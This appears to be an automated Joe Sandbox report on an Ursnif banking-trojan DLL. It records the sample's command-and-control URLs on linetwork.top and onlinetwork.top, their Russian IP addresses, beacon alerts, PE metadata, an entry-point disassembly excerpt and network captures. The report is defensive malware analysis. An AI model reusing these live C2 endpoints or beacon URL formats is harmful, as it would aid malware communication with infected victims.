                  http://linetwork.top/drew/bBjIYvLPS6LWM/5hSIaVH5/Wq734Z_2BJdIJMJo3F9GITO/_2FcMitcTe/kWvqzZ_2B_2FKKbPA/PasXIoBqTiXU/g_2FlZW7Y_2/B41HTf6QrjFt_2/BVrbTt4PzlSq49i2n_2Bd/eYvDRtuGLt_2Fv6B/tiuwwj_2BAQltrY/i8qwn6NTmmAuX65G3U/G0pEw9pKd/5FnOrAI7ls4u0lmSvnEp/39rOvZP_2BCYyBu8UVC/tWjDwJwf88LN44CDcCSZK_/2BvPg5_2BjQiD/eLQzVCVR/WPugjRuufv7WeRl3hdeCsRv/aT5ChRiLQy/6L.jlk0%Avira URL Cloudsafe
                  http://config.ed40%Avira URL Cloudsafe
                  http://linetwork.top/drew/cLUzScwIGd6lPZFBgwJAB/boGs7r3rpKnEEW26/IZwhyzcbrBr1vrh/pacdkNsvfXz_2BJd7M/nIUnH5UJy/lraLufWTWWuSthVJSQnB/skwB6_2F4mYx1hncPnC/DX7TcGWo1RJRVk4zslIVLg/yTztrtFucPEpP/M0MfTI80/ZOv2XL0MhanRoGMyGX9uAoo/dmIzHKJR6c/gnzW6jLfOR7yWUymL/vvx15g4IZ4jD/aDLfgoeX_2F/HE40tKUB0xmnED/5US9_2FwaFREdIsGRoa7p/JuiKle06sqYmlLWx/l.jlk0%Avira URL Cloudsafe
                  http://linetwork.top/70%Avira URL Cloudsafe
                  http://onlinetwork.top/drew/pkd6zgqwUDZasB/ZfiTcB208ordqnfSoXwRp/L_2FtDxOUhf3arTi/7kXxmpxOwIKTj9W/FF0%Avira URL Cloudsafe
                  http://config.edge.skype0%Avira URL Cloudsafe
                  http://onlinetwork.top/drew/rlvNc0Gi62Z2w3Lq/XhEo009f5SrCecB/UqNEgSpKb_2FxSk3FP/SwVmULm50/faoxFounD50%Avira URL Cloudsafe
                  http://linetwork.top/0%Avira URL Cloudsafe
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  linetwork.top
                  62.173.145.183
                  truetrueunknown
                  onlinetwork.top
                  31.41.44.194
                  truetrueunknown
                  NameMaliciousAntivirus DetectionReputation
                  http://linetwork.top/drew/NXo6zedpn_2B_/2BcanAQX/FnyJMATt_2F48kv6_2FGokp/FknJiZ4BPO/rcHYyBUZQ99j1sGoQ/3iqH_2FJ2MwI/44xXh3ewHre/Z3uYW8oE7cSgpQ/KoDoLpaNqGjAzcl7PDDtU/W4U8yO0BLXfpg6Fg/1LkQrB_2FwF36_2/F24Alce0F3ZIABc8fP/582wfkRmY/YYSggLyv6WiREP5aRpD7/BrtAiO3VnPYflPLClgV/qChVx2f_2BaPtkYL4DoePx/ugW_2FeHancyO/tXrlnouq/Hh9J5BBA0FEI0HWw67W05n9/zd1N.jlktrue
                  • Avira URL Cloud: safe
                  unknown
                  http://linetwork.top/drew/bBjIYvLPS6LWM/5hSIaVH5/Wq734Z_2BJdIJMJo3F9GITO/_2FcMitcTe/kWvqzZ_2B_2FKKbPA/PasXIoBqTiXU/g_2FlZW7Y_2/B41HTf6QrjFt_2/BVrbTt4PzlSq49i2n_2Bd/eYvDRtuGLt_2Fv6B/tiuwwj_2BAQltrY/i8qwn6NTmmAuX65G3U/G0pEw9pKd/5FnOrAI7ls4u0lmSvnEp/39rOvZP_2BCYyBu8UVC/tWjDwJwf88LN44CDcCSZK_/2BvPg5_2BjQiD/eLQzVCVR/WPugjRuufv7WeRl3hdeCsRv/aT5ChRiLQy/6L.jlktrue
                  • Avira URL Cloud: safe
                  unknown
                  http://linetwork.top/drew/fJ29sqPsP/PB4FnwvByjBglXFYEjZ1/hXe9prWt3B5GwuDq98v/uxK6HJV9Vv2hGb4_2BzE87/_2B7cwHJr4KZl/Z2JNy_2F/FQTy6SE98GzpaP4OycRAbeK/FNb75e_2BZ/vDSt33A5GpRAp0Wp5/3sRCo7L7mC_2/FRcDNZgk7ge/0DV7I1SHotZIJK/MawMR4TykLq9DH4qoWZqU/9lh5zRf0UXFuxlAr/44doOlzEgahzUed/pTo7pwfqznm_2FNsdD/ONqwlJdhn/hTW0RFx_2FoxngXj4_2B/7VTtckioJ/RQjhyCJh.jlktrue
                  • Avira URL Cloud: safe
                  unknown
                  http://linetwork.top/drew/cLUzScwIGd6lPZFBgwJAB/boGs7r3rpKnEEW26/IZwhyzcbrBr1vrh/pacdkNsvfXz_2BJd7M/nIUnH5UJy/lraLufWTWWuSthVJSQnB/skwB6_2F4mYx1hncPnC/DX7TcGWo1RJRVk4zslIVLg/yTztrtFucPEpP/M0MfTI80/ZOv2XL0MhanRoGMyGX9uAoo/dmIzHKJR6c/gnzW6jLfOR7yWUymL/vvx15g4IZ4jD/aDLfgoeX_2F/HE40tKUB0xmnED/5US9_2FwaFREdIsGRoa7p/JuiKle06sqYmlLWx/l.jlktrue
                  • Avira URL Cloud: safe
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  http://onlinetwork.top/regsvr32.exe, 00000003.00000003.615119181.0000000002B81000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.817169854.0000000002B81000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.608125586.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.817212768.0000000002EA4000.00000004.00000020.00020000.00000000.sdmptrue
                  • 12%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://onlinetwork.top/)regsvr32.exe, 00000003.00000003.615119181.0000000002B81000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.817169854.0000000002B81000.00000004.00000020.00020000.00000000.sdmptrue
                  • Avira URL Cloud: safe
                  unknown
                  http://onlinetwork.top/drew/u5bDuKFkXxAro/J7u_2BcQ/WcM5Uj0RwbHtvwyTUfix6_2/BcSLCk9FBn/ntIlUfYV61xDv7regsvr32.exe, 00000003.00000002.817169854.0000000002B81000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.816986286.0000000002B1A000.00000004.00000020.00020000.00000000.sdmptrue
                  • Avira URL Cloud: safe
                  unknown
                  http://linetwork.top/drew/NXo6zedpn_2B_/2BcanAQX/FnyJMATt_2F48kv6_2FGokp/FknJiZ4BPO/rcHYyBUZQ99j1sGorundll32.exe, 00000004.00000003.608109363.0000000002E94000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.817171123.0000000002E95000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.817003382.0000000002E40000.00000004.00000020.00020000.00000000.sdmptrue
                  • Avira URL Cloud: safe
                  unknown
                  http://onlinetwork.top/Mrundll32.exe, 00000004.00000003.608125586.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.817212768.0000000002EA4000.00000004.00000020.00020000.00000000.sdmptrue
                  • Avira URL Cloud: safe
                  unknown
                  http://onlinetwork.top/drew/wmWOP2SQu9/lkwlizEoFo7LtzQm_/2FQKnjOJS7Fs/1omPLrC4w2x/Krundll32.exe, 00000005.00000002.817185971.0000000002E0C000.00000004.00000010.00020000.00000000.sdmptrue
                  • Avira URL Cloud: safe
                  unknown
                  http://linetwork.top/drew/cLUzScwIGd6lPZFBgwJAB/boGs7r3rpKnEEW26/IZwhyzcbrBr1vrh/pacdkNsvfXz_2BJd7M/regsvr32.exe, 00000003.00000003.615051454.0000000002B71000.00000004.00000020.00020000.00000000.sdmptrue
                  • Avira URL Cloud: safe
                  unknown
                  http://onlinetwork.top/drew/fkPc2r0gVHV/J_2FZDZ2sHG5ME/g7AZzNZ7pG5EAQpQ0yMPw/2o1hBcleFqeXJ_2F/_2BIHRrundll32.exe, 00000004.00000002.817262107.0000000002EB1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.608139585.0000000002EB1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.608125586.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.817212768.0000000002EA4000.00000004.00000020.00020000.00000000.sdmptrue
                  • Avira URL Cloud: safe
                  unknown
                  http://config.ed4rundll32.exe, 00000004.00000003.608109363.0000000002E94000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.817171123.0000000002E95000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://onlinetwork.top/drew/pkd6zgqwUDZasB/ZfiTcB208ordqnfSoXwRp/L_2FtDxOUhf3arTi/7kXxmpxOwIKTj9W/FFrundll32.exe, 00000004.00000002.817078743.0000000002E65000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.817003382.0000000002E40000.00000004.00000020.00020000.00000000.sdmptrue
                  • Avira URL Cloud: safe
                  unknown
                  http://linetwork.top/7rundll32.exe, 00000004.00000003.608139585.0000000002EB1000.00000004.00000020.00020000.00000000.sdmptrue
                  • Avira URL Cloud: safe
                  unknown
                  http://onlinetwork.top/drew/rlvNc0Gi62Z2w3Lq/XhEo009f5SrCecB/UqNEgSpKb_2FxSk3FP/SwVmULm50/faoxFounD5regsvr32.exe, 00000003.00000003.615119181.0000000002B81000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.817106892.0000000002B59000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.817169854.0000000002B81000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.615051454.0000000002B71000.00000004.00000020.00020000.00000000.sdmptrue
                  • Avira URL Cloud: safe
                  unknown
                  http://config.edge.skyperundll32.exe, 00000004.00000003.608109363.0000000002E94000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.817171123.0000000002E95000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://linetwork.top/rundll32.exe, 00000004.00000003.608125586.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.817212768.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.817112343.0000000002E76000.00000004.00000020.00020000.00000000.sdmptrue
                  • Avira URL Cloud: safe
                  unknown
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  62.173.145.183
                  linetwork.topRussian Federation
                  34300SPACENET-ASInternetServiceProviderRUtrue
                  31.41.44.194
                  onlinetwork.topRussian Federation
                  56577ASRELINKRUtrue
                  IP
                  192.168.2.1
                  Joe Sandbox Version:36.0.0 Rainbow Opal
                  Analysis ID:727158
                  Start date and time:2022-10-21 00:24:06 +02:00
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 7m 57s
                  Hypervisor based Inspection enabled:false
                  Report type:light
                  Sample file name:ursnif_IAT_corrected.exe.dll
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                  Number of analysed new started processes analysed:27
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal100.troj.evad.winDLL@10/0@8/3
                  EGA Information:
                  • Successful, ratio: 100%
                  HDC Information:
                  • Successful, ratio: 82% (good quality ratio 77.8%)
                  • Quality average: 80.5%
                  • Quality standard deviation: 28.7%
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 0
                  • Number of non-executed functions: 0
                  Cookbook Comments:
                  • Found application associated with file extension: .dll
                  • Override analysis time to 240s for rundll32
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                  • Excluded IPs from analysis (whitelisted): 13.107.42.16
                  • Excluded domains from analysis (whitelisted): config.edge.skype.com.trafficmanager.net, l-0007.config.skype.com, config-edge-skype.l-0007.l-msedge.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, l-0007.l-msedge.net, arc.msn.com, config.edge.skype.com
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  TimeTypeDescription
                  00:25:01API Interceptor2x Sleep call for process: rundll32.exe modified
                  No context
                  No context
                  No context
                  No context
                  No context
                  No created / dropped files found
                  File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                  Entropy (8bit):5.836151375360273
                  TrID:
                  • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                  • Generic Win/DOS Executable (2004/3) 0.20%
                  • DOS Executable Generic (2002/1) 0.20%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:ursnif_IAT_corrected.exe.dll
                  File size:57344
                  MD5:8b52c277c63c5877c0e4ca32d1458957
                  SHA1:1d64f4610c6e0af8a3e3a9d8e8b794fc1bebeef5
                  SHA256:8d2f90927603c33947463dc9846dc1b7a220ea1f13dc1a0ccfe538d5f83bbfe2
                  SHA512:9f7022155d4764e625fe1a6b5377eed4b2e7620a9bd03c7f5474112de30bb60b7898c5e9a325035544d01c3621bff103f6b857373d146c1f622772e1abbf1b99
                  SSDEEP:768:A2KGmsx3R69vSvjyRpq63goMWPXE2bE/JVMq2LATqeeAeOu2D2wqmLiu6:wGBx3R6iApqlaPGhVMq2LpeReOb2Pmp
                  TLSH:EB43E06A6F6008F7C1A3823636397795EA09132141356CD4E7970D381BDA95EEEBF313
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Xo.T.............v.......v..........n............................v.......v.......v......Rich............PE..L.....%c...........
                  Icon Hash:74f0e4ecccdce0e4
                  Entrypoint:0x10001d80
                  Entrypoint Section:.text
                  Digitally signed:false
                  Imagebase:0x10000000
                  Subsystem:windows gui
                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
                  DLL Characteristics:
                  Time Stamp:0x632596CB [Sat Sep 17 09:43:39 2022 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:5
                  OS Version Minor:0
                  File Version Major:5
                  File Version Minor:0
                  Subsystem Version Major:5
                  Subsystem Version Minor:0
                  Import Hash:3e85858f9f91b022a15a56437fb6f7c2
                  Instruction
                  push ebp
                  mov ebp, esp
                  push ecx
                  mov eax, dword ptr [ebp+0Ch]
                  push ebx
                  push esi
                  push edi
                  xor edi, edi
                  inc edi
                  xor ebx, ebx
                  sub eax, ebx
                  mov dword ptr [ebp-04h], edi
                  je 00007F0F88C99A41h
                  dec eax
                  jne 00007F0F88C99A8Bh
                  push 10004188h
                  call dword ptr [10003050h]
                  cmp eax, edi
                  jne 00007F0F88C99A78h
                  push ebx
                  push 00400000h
                  push ebx
                  call dword ptr [10003038h]
                  mov dword ptr [10004190h], eax
                  cmp eax, ebx
                  je 00007F0F88C99A0Ch
                  mov eax, dword ptr [ebp+08h]
                  mov esi, 10004198h
                  mov dword ptr [100041B0h], eax
                  mov eax, esi
                  lock xadd dword ptr [eax], edi
                  mov ecx, dword ptr [ebp+10h]
                  lea eax, dword ptr [ebp+0Ch]
                  push eax
                  call 00007F0F88C99316h
                  push eax
                  push 1000177Ah
                  call 00007F0F88C992ADh
                  mov dword ptr [1000418Ch], eax
                  cmp eax, ebx
                  jne 00007F0F88C99A2Bh
                  or eax, FFFFFFFFh
                  lock xadd dword ptr [esi], eax
                  mov dword ptr [ebp-04h], ebx
                  jmp 00007F0F88C99A1Fh
                  push 10004188h
                  call dword ptr [1000304Ch]
                  test eax, eax
                  jne 00007F0F88C99A10h
                  cmp dword ptr [1000418Ch], ebx
                  je 00007F0F88C999FCh
                  mov esi, 00002328h
                  push edi
                  push 00000064h
                  call dword ptr [10003044h]
                  mov eax, dword ptr [10004198h]
                  test eax, eax
                  je 00007F0F88C999D9h
                  sub esi, 64h
                  cmp esi, ebx
                  jnle 00007F0F88C999B9h
                  push dword ptr [1000418Ch]
                  call dword ptr [1000300Ch]
                  push dword ptr [00000000h]
                  Programming Language:
                  • [ASM] VS2008 SP1 build 30729
                  • [IMP] VS2008 SP1 build 30729
                  • [EXP] VS2008 SP1 build 30729
                  • [LNK] VS2008 SP1 build 30729
                  NameVirtual AddressVirtual Size Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT0x35700x4e.rdata
                  IMAGE_DIRECTORY_ENTRY_IMPORT0x310c0x50.rdata
                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x60000x14c.reloc
                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IAT0x30000xbc.rdata
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                  .text0x10000x16c70x2000False0.5145263671875data5.2662186547605145IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  .rdata0x30000x5be0x1000False0.241455078125data2.579542966094096IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .data0x40000x25c0x1000False0.016357421875Matlab v4 mat-file (little endian) *P, rows 5, columns 7, imaginary0.0602032822141183IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .bss0x50000x2dc0x1000False0.1953125data2.0330780582319483IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .reloc0x60000x80000x7400False0.9559199892241379data7.8057957709243295IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  DLLImport
                  ntdll.dll_snwprintf, memset, NtQuerySystemInformation, _aulldiv, RtlUnwind, NtQueryVirtualMemory
                  KERNEL32.dllSetThreadAffinityMask, CloseHandle, GetLocaleInfoA, GetSystemDefaultUILanguage, SetThreadPriority, HeapFree, Sleep, ExitThread, lstrlenW, GetLastError, VerLanguageNameA, GetExitCodeThread, HeapCreate, HeapDestroy, GetCurrentThread, SleepEx, WaitForSingleObject, InterlockedDecrement, InterlockedIncrement, HeapAlloc, GetModuleHandleA, GetModuleFileNameW, SetLastError, VirtualProtect, OpenProcess, CreateEventA, GetLongPathNameW, GetVersion, GetCurrentProcessId, TerminateThread, QueueUserAPC, CreateThread, GetProcAddress, LoadLibraryA, MapViewOfFile, GetSystemTimeAsFileTime, CreateFileMappingW
                  ADVAPI32.dllConvertStringSecurityDescriptorToSecurityDescriptorA
                  NameOrdinalAddress
                  DllRegisterServer10x10001c50
                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                  192.168.2.413.107.42.1649715802033204 10/21/22-00:25:18.871319TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4971580192.168.2.413.107.42.16
                  192.168.2.413.107.42.1649747802033204 10/21/22-00:27:40.718067TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4974780192.168.2.413.107.42.16
                  192.168.2.413.107.42.1649718802033204 10/21/22-00:25:20.730105TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4971880192.168.2.413.107.42.16
                  192.168.2.413.107.42.1649747802033203 10/21/22-00:27:40.718067TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4974780192.168.2.413.107.42.16
                  192.168.2.462.173.145.18349742802033203 10/21/22-00:27:12.300672TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4974280192.168.2.462.173.145.183
                  192.168.2.462.173.145.18349742802033204 10/21/22-00:27:12.300672TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4974280192.168.2.462.173.145.183
                  192.168.2.413.107.42.1649711802033203 10/21/22-00:25:09.002887TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4971180192.168.2.413.107.42.16
                  192.168.2.48.8.8.859444532023883 10/21/22-00:25:29.478642UDP2023883ET DNS Query to a *.top domain - Likely Hostile5944453192.168.2.48.8.8.8
                  192.168.2.413.107.42.1649711802033204 10/21/22-00:25:09.002887TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4971180192.168.2.413.107.42.16
                  192.168.2.48.8.8.858914532023883 10/21/22-00:27:11.884556UDP2023883ET DNS Query to a *.top domain - Likely Hostile5891453192.168.2.48.8.8.8
                  192.168.2.413.107.42.1649719802033203 10/21/22-00:25:23.881073TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4971980192.168.2.413.107.42.16
                  192.168.2.462.173.145.18349743802033203 10/21/22-00:27:20.607846TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4974380192.168.2.462.173.145.183
                  192.168.2.462.173.145.18349743802033204 10/21/22-00:27:20.607846TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4974380192.168.2.462.173.145.183
                  192.168.2.462.173.145.18349744802033204 10/21/22-00:27:22.814108TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4974480192.168.2.462.173.145.183
                  192.168.2.413.107.42.1649748802033203 10/21/22-00:27:42.910400TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4974880192.168.2.413.107.42.16
                  192.168.2.413.107.42.1649746802033204 10/21/22-00:27:32.445316TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4974680192.168.2.413.107.42.16
                  192.168.2.413.107.42.1649748802033204 10/21/22-00:27:42.910400TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4974880192.168.2.413.107.42.16
                  192.168.2.462.173.145.18349744802033203 10/21/22-00:27:22.814108TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4974480192.168.2.462.173.145.183
                  192.168.2.462.173.145.18349745802033204 10/21/22-00:27:25.963477TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4974580192.168.2.462.173.145.183
                  TimestampSource PortDest PortSource IPDest IP
                  Oct 21, 2022 00:25:29.918468952 CEST4972080192.168.2.431.41.44.194
                  Oct 21, 2022 00:25:33.074470997 CEST4972080192.168.2.431.41.44.194
                  Oct 21, 2022 00:25:39.090687990 CEST4972080192.168.2.431.41.44.194
                  Oct 21, 2022 00:25:39.379411936 CEST4972180192.168.2.431.41.44.194
                  Oct 21, 2022 00:25:41.311271906 CEST4972280192.168.2.431.41.44.194
                  Oct 21, 2022 00:25:42.372112989 CEST4972180192.168.2.431.41.44.194
                  Oct 21, 2022 00:25:44.325324059 CEST4972280192.168.2.431.41.44.194
                  Oct 21, 2022 00:25:44.510185957 CEST4972380192.168.2.431.41.44.194
                  Oct 21, 2022 00:25:47.513168097 CEST4972380192.168.2.431.41.44.194
                  Oct 21, 2022 00:25:48.372597933 CEST4972180192.168.2.431.41.44.194
                  Oct 21, 2022 00:25:50.404005051 CEST4972280192.168.2.431.41.44.194
                  Oct 21, 2022 00:25:53.529212952 CEST4972380192.168.2.431.41.44.194
                  Oct 21, 2022 00:27:12.204819918 CEST4974280192.168.2.462.173.145.183
                  Oct 21, 2022 00:27:12.263849974 CEST804974262.173.145.183192.168.2.4
                  Oct 21, 2022 00:27:12.263995886 CEST4974280192.168.2.462.173.145.183
                  Oct 21, 2022 00:27:12.300672054 CEST4974280192.168.2.462.173.145.183
                  Oct 21, 2022 00:27:12.361299992 CEST804974262.173.145.183192.168.2.4
                  Oct 21, 2022 00:27:12.361354113 CEST804974262.173.145.183192.168.2.4
                  Oct 21, 2022 00:27:12.361531019 CEST4974280192.168.2.462.173.145.183
                  Oct 21, 2022 00:27:12.396564960 CEST4974280192.168.2.462.173.145.183
                  Oct 21, 2022 00:27:12.455626965 CEST804974262.173.145.183192.168.2.4
                  Oct 21, 2022 00:27:20.546178102 CEST4974380192.168.2.462.173.145.183
                  Oct 21, 2022 00:27:20.606978893 CEST804974362.173.145.183192.168.2.4
                  Oct 21, 2022 00:27:20.607181072 CEST4974380192.168.2.462.173.145.183
                  Oct 21, 2022 00:27:20.607846022 CEST4974380192.168.2.462.173.145.183
                  Oct 21, 2022 00:27:20.668095112 CEST804974362.173.145.183192.168.2.4
                  Oct 21, 2022 00:27:20.668124914 CEST804974362.173.145.183192.168.2.4
                  Oct 21, 2022 00:27:20.668193102 CEST4974380192.168.2.462.173.145.183
                  Oct 21, 2022 00:27:20.668384075 CEST4974380192.168.2.462.173.145.183
                  Oct 21, 2022 00:27:20.729041100 CEST804974362.173.145.183192.168.2.4
                  Oct 21, 2022 00:27:22.748816013 CEST4974480192.168.2.462.173.145.183
                  Oct 21, 2022 00:27:22.807856083 CEST804974462.173.145.183192.168.2.4
                  Oct 21, 2022 00:27:22.808012962 CEST4974480192.168.2.462.173.145.183
                  Oct 21, 2022 00:27:22.814107895 CEST4974480192.168.2.462.173.145.183
                  Oct 21, 2022 00:27:22.872728109 CEST804974462.173.145.183192.168.2.4
                  Oct 21, 2022 00:27:22.872811079 CEST804974462.173.145.183192.168.2.4
                  Oct 21, 2022 00:27:22.873013020 CEST4974480192.168.2.462.173.145.183
                  Oct 21, 2022 00:27:22.873074055 CEST4974480192.168.2.462.173.145.183
                  Oct 21, 2022 00:27:22.931992054 CEST804974462.173.145.183192.168.2.4
                  Oct 21, 2022 00:27:25.901638985 CEST4974580192.168.2.462.173.145.183
                  Oct 21, 2022 00:27:25.962555885 CEST804974562.173.145.183192.168.2.4
                  Oct 21, 2022 00:27:25.962951899 CEST4974580192.168.2.462.173.145.183
                  Oct 21, 2022 00:27:25.963476896 CEST4974580192.168.2.462.173.145.183
                  Oct 21, 2022 00:27:26.023914099 CEST804974562.173.145.183192.168.2.4
                  Oct 21, 2022 00:27:26.023978949 CEST804974562.173.145.183192.168.2.4
                  Oct 21, 2022 00:27:26.024106979 CEST4974580192.168.2.462.173.145.183
                  Oct 21, 2022 00:27:26.024324894 CEST4974580192.168.2.462.173.145.183
                  Oct 21, 2022 00:27:26.084299088 CEST804974562.173.145.183192.168.2.4
                  Oct 21, 2022 00:27:52.484318018 CEST4975080192.168.2.431.41.44.194
                  Oct 21, 2022 00:27:55.492575884 CEST4975080192.168.2.431.41.44.194
                  Oct 21, 2022 00:28:00.769026995 CEST4975180192.168.2.431.41.44.194
                  Oct 21, 2022 00:28:01.493290901 CEST4975080192.168.2.431.41.44.194
                  Oct 21, 2022 00:28:02.951421976 CEST4975280192.168.2.431.41.44.194
                  Oct 21, 2022 00:28:03.774499893 CEST4975180192.168.2.431.41.44.194
                  Oct 21, 2022 00:28:05.946647882 CEST4975280192.168.2.431.41.44.194
                  Oct 21, 2022 00:28:06.140753984 CEST4975380192.168.2.431.41.44.194
                  Oct 21, 2022 00:28:09.149972916 CEST4975380192.168.2.431.41.44.194
                  Oct 21, 2022 00:28:09.775011063 CEST4975180192.168.2.431.41.44.194
                  Oct 21, 2022 00:28:11.947268009 CEST4975280192.168.2.431.41.44.194
                  Oct 21, 2022 00:28:15.150471926 CEST4975380192.168.2.431.41.44.194
                  TimestampSource PortDest PortSource IPDest IP
                  Oct 21, 2022 00:25:29.478641987 CEST5944453192.168.2.48.8.8.8
                  Oct 21, 2022 00:25:29.915838957 CEST53594448.8.8.8192.168.2.4
                  Oct 21, 2022 00:25:39.180322886 CEST5557053192.168.2.48.8.8.8
                  Oct 21, 2022 00:25:39.373328924 CEST53555708.8.8.8192.168.2.4
                  Oct 21, 2022 00:25:40.999285936 CEST6490653192.168.2.48.8.8.8
                  Oct 21, 2022 00:25:41.308494091 CEST53649068.8.8.8192.168.2.4
                  Oct 21, 2022 00:25:44.133048058 CEST5944653192.168.2.48.8.8.8
                  Oct 21, 2022 00:25:44.507917881 CEST53594468.8.8.8192.168.2.4
                  Oct 21, 2022 00:27:11.884556055 CEST5891453192.168.2.48.8.8.8
                  Oct 21, 2022 00:27:12.202425003 CEST53589148.8.8.8192.168.2.4
                  Oct 21, 2022 00:27:20.512377977 CEST5141953192.168.2.48.8.8.8
                  Oct 21, 2022 00:27:20.531629086 CEST53514198.8.8.8192.168.2.4
                  Oct 21, 2022 00:27:22.557136059 CEST5105453192.168.2.48.8.8.8
                  Oct 21, 2022 00:27:22.746049881 CEST53510548.8.8.8192.168.2.4
